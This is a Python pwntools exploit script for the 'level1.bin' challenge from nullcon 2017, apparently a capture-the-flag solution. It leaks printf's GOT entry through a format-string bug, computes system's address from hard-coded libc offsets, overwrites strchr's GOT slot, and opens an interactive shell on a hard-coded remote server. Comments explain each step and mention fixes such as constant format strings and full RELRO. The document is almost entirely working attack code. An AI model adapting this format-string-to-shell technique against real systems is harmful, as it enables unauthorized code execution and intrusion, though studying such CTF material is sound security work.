exploit for level1.bin (nullcon 2017)
#!/usr/bin/python
# exploit for level1.bin (nullcon 2017)
from pwn import *
def add_book(p):
    """Drive the target's "add book" menu path (choice 1) with placeholder values.

    Every answer is followed by a wait for the prompt the binary prints next,
    so the tube is parked right after the "Enter book id: " answer on return.

    Args:
        p: pwntools tube already positioned at the "Enter choice: " prompt.

    Returns:
        None.
    """
    # (answer to send, prompt to wait for afterwards) in menu order.
    dialogue = [
        ('1', 'Enter book name: '),
        ('a', 'Enter book id: '),
        ('1', None),
    ]
    for answer, next_prompt in dialogue:
        p.sendline(answer)
        if next_prompt is not None:
            p.recvuntil(next_prompt)
def leak_addr(p, addr):
    """Read the 4-byte value stored at `addr` in the target via menu choice 3.

    The query sent is a packed little-endian pointer followed by "%11$s".
    The target appears to use the query itself as a printf-style format
    (the bug this script exercises), so the "%11$s" directive prints the
    bytes that the 11th variadic slot points to -- assumed here to be the
    packed pointer at the start of this same buffer; confirm against the
    binary.  On the target side the fix is a constant format string
    (user input passed as an argument, with -Wformat-security enabled).

    Args:
        p: pwntools tube already positioned at the "Enter choice: " prompt.
        addr: 32-bit address to read from.

    Returns:
        The little-endian u32 found at `addr`, as an int.

    Notes:
        Python 2 str semantics are assumed: on Python 3 pwntools, p32()
        returns bytes and `p32(addr) + "%11$s"` raises TypeError.
        The [20:24] slice depends on exactly what the target echoes before
        the leaked bytes; it is specific to this binary -- confirm with a
        local run before reusing.
    """
    p.sendline('3')
    p.recvuntil('Enter query: ')
    # Pointer first, directive second: the directive dereferences the slot
    # the pointer is assumed to occupy.
    leak_fmt_str = p32(addr) + "%11$s"
    p.sendline(leak_fmt_str)
    result = p.recvline().strip()
    # Skip the echoed prefix; the 4 leaked bytes sit at offset 20..24.
    return u32(result[20:24])
if __name__ == '__main__':
    # Target selection: a local run (commented out) or the 2017 event server.
    # Host and port are hard-coded for that instance.
    #p = process('./level1.bin', stdin=process.PTY)
    p = remote('34.198.96.6', 9001)
    p.recvuntil('Enter choice: ')
    # One "add book" before the query path -- presumably state the binary
    # needs before choice 3 works; confirm.
    add_book(p)
    p.recvuntil('Enter choice: ')
    # Leak the pointer stored at 0x804b014.  The variable name suggests this
    # is printf's GOT entry -- verify with `readelf -r level1.bin`.
    printf = leak_addr(p, 0x804b014)
    # Offsets of printf and system inside the remote libc build.  They are
    # specific to that exact libc; on any other build the arithmetic below
    # yields a wrong address.
    printf_offset = 0x0004cdd0
    system_offset = 0x0003fe70
    system = printf - printf_offset + system_offset
    # GOT slot of strchr, the entry rewritten below.  Full RELRO
    # (-Wl,-z,relro,-z,now) makes the GOT read-only and blocks this write;
    # the root cause remains the non-constant format string.
    strchr_got = 0x804b030
    log.info("printf @ %#x" % printf)
    log.info("system @ %#x" % system)
    # The query string doubles as the argument of the redirected call; the
    # trailing "# " makes a shell ignore the format bytes that follow it.
    payload = "/bin/sh # "
    # pwntools helper that encodes "write `system` into strchr_got" as
    # format directives.  14 = stack argument index where this buffer is
    # assumed to start; numbwritten=12 = bytes assumed already emitted when
    # the directives run.  Both are target-specific -- confirm.
    # Python 2 str is assumed: on Python 3 pwntools this returns bytes and
    # the += raises TypeError.
    payload += fmtstr_payload(14, {strchr_got: system}, numbwritten=12)
    p.sendline('3')
    p.recvuntil('Enter query: ')
    p.sendline(payload)
    p.interactive()